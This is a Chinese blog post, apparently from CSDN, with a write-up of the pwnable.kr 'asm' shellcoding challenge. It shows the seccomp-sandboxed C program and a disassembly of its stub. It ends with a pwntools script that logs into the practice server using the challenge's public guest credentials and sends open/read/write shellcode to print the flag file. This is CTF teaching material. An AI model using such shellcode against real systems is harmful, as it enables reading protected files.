pwnable之asm

最新推荐文章于 2024-05-01 03:20:48 发布
最新推荐文章于 2024-05-01 03:20:48 发布
阅读量643 收藏
点赞数
分类专栏: pwnable 文章标签: pwn pwnable
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/pwd_3/article/details/78108610
版权

问题描述

Welcome to shellcoding practice challenge.
In this challenge, you can run your x64 shellcode under SECCOMP sandbox.
Try to make shellcode that spits flag using open()/read()/write() systemcalls only.
If this does not challenge you. you should play 'asg' challenge

asm.c

#include <stdio.h>                                                                                       
#include <string.h>                                                                                      
#include <stdlib.h>                                                                                      
#include <sys/mman.h>                                                                                    
#include <seccomp.h>                                                                                     
#include <sys/prctl.h>                                                                                   
#include <fcntl.h>                                                                                       
#include <unistd.h>                                                                                      

#define LENGTH 128                                                                                       

void sandbox(){                                                                                          
        scmp_filter_ctx ctx = seccomp_init(SCMP_ACT_KILL);                                               
        if (ctx == NULL) {                                                                               
                printf("seccomp error\n");                                                               
                exit(0);                                                                                 
        }                                                                                                

        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(open), 0);                                        
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(read), 0);                                        
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(write), 0);                                       
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit), 0);                                        
        seccomp_rule_add(ctx, SCMP_ACT_ALLOW, SCMP_SYS(exit_group), 0);                                  

        if (seccomp_load(ctx) < 0){                                                                      
                seccomp_release(ctx);                                                                    
                printf("seccomp error\n");                                                               
                exit(0);                                                                                 
        }                                                                                                
        seccomp_release(ctx);                                                                            
}                                                                                                        

char stub[] = "\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x
31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff";             
unsigned char filter[256];                                                                               
int main(int argc, char* argv[]){                                                                        

        setvbuf(stdout, 0, _IONBF, 0);                                                                   
        setvbuf(stdin, 0, _IOLBF, 0);                                                                    

        printf("Welcome to shellcoding practice challenge.\n");                                          
        printf("In this challenge, you can run your x64 shellcode under SECCOMP sandbox.\n");            
        printf("Try to make shellcode that spits flag using open()/read()/write() systemcalls only.\n"); 
        printf("If this does not challenge you. you should play 'asg' challenge :)\n");                  

        char* sh = (char*)mmap(0x41414000, 0x1000, 7, MAP_ANONYMOUS | MAP_FIXED | MAP_PRIVATE, 0, 0);    
        memset(sh, 0x90, 0x1000);                                                                        
        memcpy(sh, stub, strlen(stub));                                                                  

        int offset = sizeof(stub);                                                                       
        printf("give me your x64 shellcode: ");                                                          
        read(0, sh+offset, 1000);                                                                        

        alarm(10);                                                                                       
        chroot("/home/asm_pwn");        // you are in chroot jail. so you can't use symlink in /tmp      
        sandbox();                                                                                       
        ((void (*)(void))sh)();                                                                          
        return 0;                                                                                        
}

分析
sh可以写入shellcode,sub是对寄存器清零操作。

(ipython)
In [4]: print disasm('\x48\x31\xc0\x48\x31\xdb\x48\x31\xc9\x48\x31\xd2\x48\x31\xf6\x48\x31\xff\x48\x31\xed\x4d\x31\xc0\x4d\x31\xc9\x4d\x31\xd2\x4d\x31\xdb\x4d\x31\xe4\x4d\x31\xed\x4d\x31\xf6\x4d\x31\xff')
   0:   48 31 c0                xor    rax,rax
   3:   48 31 db                xor    rbx,rbx
   6:   48 31 c9                xor    rcx,rcx
   9:   48 31 d2                xor    rdx,rdx
   c:   48 31 f6                xor    rsi,rsi
   f:   48 31 ff                xor    rdi,rdi
  12:   48 31 ed                xor    rbp,rbp
  15:   4d 31 c0                xor    r8,r8
  18:   4d 31 c9                xor    r9,r9
  1b:   4d 31 d2                xor    r10,r10
  1e:   4d 31 db                xor    r11,r11
  21:   4d 31 e4                xor    r12,r12
  24:   4d 31 ed                xor    r13,r13
  27:   4d 31 f6                xor    r14,r14
  2a:   4d 31 ff                xor    r15,r15

在sandbox里只能调用open,read,write。

from pwn import *
con = ssh(host='pwnable.kr',user='asm',password='guest',port=2222)
p = con.connect_remote('0',9026)
context.arch='amd64'

shellcode = ''
shellcode += shellcraft.pushstr('this_is_pwnable.kr_flag_file_please_read_this_file.sorry_the_file_name_is_very_loooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooooo0000000000000000000000000ooooooooooooooooooooooo000000000000o0o0o0o0o0o0ong')
shellcode += shellcraft.open('rsp',0,0)
shellcode += shellcraft.read('rax','rsp',0x80)
shellcode += shellcraft.write(1,'rsp',0x80)
p.sendline(asm(shellcode))
print p.recvall()
pwd_3
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
pwnable.kr之asm
Jason_ZhouYetao的博客
07-23 551
这题我认为主要考察的知识点一个是沙箱中可用函数还有就是shellcode这个大头问题。 首先看看这道题目的代码: root@kali:~# ssh asm@pwnable.kr -p2222 asm@pwnable.kr's password: ____ __ __ ____ ____ ____ _ ___ __ _ ____ | ...
pwnable_asm
z1r0的博客
03-16 259
pwnable_asm 查看保护 orw来读flag就可以了,程序在0x41414000这里创建了0x1000大小的空间,我们可以将flag拿到这里然后 输出即可。 orw其实就是open read write open(file=‘flag’, oflag=0, mode=0); read(3, 0x41414000, 0x100) write(fd=1, buf=0x41414000, n=0x100) 意思就是打开flag,读取flag到0x41414000,从0x41414000中读取数据到屏幕
2024年Sandbox的安全机制 —— 使用 seccomp
最新发布
2401_84253850的博客
05-01 366
seccomp_init的作用就是初始化 scmp_filter_ctx结构。需要注意的是,任何其他libseccomp中的函数调用,必须在seccomp_init之后。scmp_filter_ctx seccomp_init(uint32_t def_action);成功返回scmp_filter_ctx(过滤器上下文) ctx;失败返回NULLdef_action用于指定默认行为,有效动作值如下:(当线程调用了过滤规则中没有相关配置规则的系统调用时触发)线程将会被内核以SIGSYS信号终止;整个进程被终
pwnable-asm
网安星空
02-09 1449
pwnable.kr是一个经典的CTF中PWN方向练习的专业网站,本文记录的题目是asm,主要考察的是shellcode的使用。
BUUCTF Pwn pwnable_asm
ChaoYue_miku的博客
07-10 354
64位ELF 开启了沙箱,允许使用open()、read()、write()三个函数。  主要逻辑基本都在main函数当中,首先用函数映射出一块内存空间,起始地址为,大小为。  flag文件位于相同根目录下,可以利用这一函数试探文件名既具体位置。 核心思想是利用首先利用函数打开flag,然后利用函数将flag读入刚才映射好的内存空间中,最后利用函数写flag到屏幕上即可。根据刚才的分析,可以编写如下的 0x03 运行exp 本地调试好之后,远程连接靶场,运行flag{7be081e2-506e-423
asm - pwnable
SkYe's Blog
09-20 267
asm - pwnable 题目 Mommy! I think I know how to make shellcodes ssh asm@pwnable.kr -p2222 (pw: guest) readme文件给出提示: once you connect to port 9026, the "asm" binary will be executed under asm_pwn privi...
ASM 1351.zip
06-02
ASM 1351 是一款由ASMedia( ASM 微电子)公司开发的集成电路,主要应用于数据传输和接口控制领域。这个压缩包“ASM 1351.zip”包含了与ASM 1351相关的三个关键文件:一个固件升级工具、数据表以及设计套件。 1. **...
ASM330LHH application
03-13
ASM330LHH application
Oracle ASM详解
04-20
Oracle ASM详解 Oracle ASM(Automatic Storage Management)是一种高级的存储管理系统,由Oracle公司开发,旨在提供高可用性、可扩展性和灵活性的存储解决方案。ASM可以自动管理存储介质,提供高性能的I/O操作和高...
ASM1083 PCIe转PCI芯片数据表
09-14
ASM1083 PCIe转PCI芯片数据表 ASM1083 PCIe转PCI芯片数据表是ASMedia TECHNOLOGY INC.公司出品的一款PCIe转PCI桥接芯片,其主要功能是将PCI Express(Peripheral Component Interconnect Express)接口转换为传统的...
ASM1061资料文件.rar
01-03
ASM1061是一款广泛应用在PCI-E到SATA转换中的控制器芯片,由ASMtek公司生产。这个"ASM1061资料文件.rar"压缩包包含了关于该芯片的详细设计资料,对于开发者、工程师或者硬件爱好者来说是极其宝贵的资源。下面我们将...
pwnable.kr 之asm
Bill
04-30 2116
一个真正的高手应该学会写shellcode. 首先查看c代码:#include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #include <sys/prctl.h> #include <fcntl.h> #include <unistd.h>#defin
pwnable.kr】 asm
子曰小玖的博客
06-05 265
https://www.cnblogs.com/p4nda/p/7169456.html 一道写shellcode的题目, #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h> #include <seccomp.h> #...
pwnable.kr [asm]
shisuan1的博客
12-26 369
pwnable.kr [asm] #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;seccomp.h&gt; #include &lt;sys/prctl.h&gt; #include &lt;fcntl.h&g
pwnable.kr asm
r250414958的博客
12-08 256
看样子是一道和shellcode有关的题目 连上去看看 目录下好像有个说明的文件查看一下 大概意思就是连接到9026端口 asm再特权下执行并get flag 那我们先看一下asm.c #include <stdio.h> #include <string.h> #include <stdlib.h> #include <sys/mman.h>...
Pwnable之[Toddler's Bottle](三)--asm
杀生丸?不,其实我要的是桔梗
03-30 260
Pwnable之[Toddler’s Bottle](三)–ASM 提示:我觉得一个黑客应该知道怎么做shellcode 查看代码asm.c的代码 #include &lt;stdio.h&gt; #include &lt;string.h&gt; #include &lt;stdlib.h&gt; #include &lt;sys/mman.h&gt; #include &lt;sec...
pwnable.k asm 知识点总结
qq_43189757的博客
06-25 332
1.mmap 创建新的内存虚拟区域 void *mmap(void *start, size_t length, int prot, int flags, int fd, off_t offset); start: 新的虚拟内存区域最好是从start 开始的一个区域 length: 连续的对象片的大小为length 字节 offset:从据文件开始处偏移量为offset字节的地方开始 prot:...
pwnable.kr asm (open函数的探究)
BengDouLove的博客
04-06 440
这其实是一道挺简单的题,会用pwntools写shellcode就行了,不过里面有一个小点,网上别的文章从没有人提过,前两天学校有人讲座讲了这道题,然后也讲错了。。。不求甚解也得看情况。。 连上去,然后ls发现有这么几个文件,, 这是asm.c #include <stdio.h> #include <string.h> #include <stdlib.h>...
[BUUCTF]PWN——pwnable_start
mcmuyanga的博客
12-05 1148
pwnable_start 附件 步骤: 例行检查,32位程序,什么保护都没开,首先想到的是ret2shellcode的方法 本地试运行一下,看看程序大概的情况 32位ida载入,没法f5,好在汇编不长,看得懂 一开始调用write函数输出了let’s start the ctf,4是write函数的调用号,之后的调用号是3,调用了read函数,我们知道dl这个寄存器是控制输入字符的多少的,也就是所我们可以输入0x3c个字符,也就是执行了 write(1,buf,0x14) read
Oracle12c 实战ASM(12.1) 安装配置
03-05
"Oracle12c 实战ASM(12.1) 安装配置" Oracle ASM(Automatic Storage Management)是Oracle数据库系统中的一个组件,它提供了集成的存储管理功能,包括磁盘管理和I/O调度。在Oracle 12c版本中,ASM允许数据库管理员...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值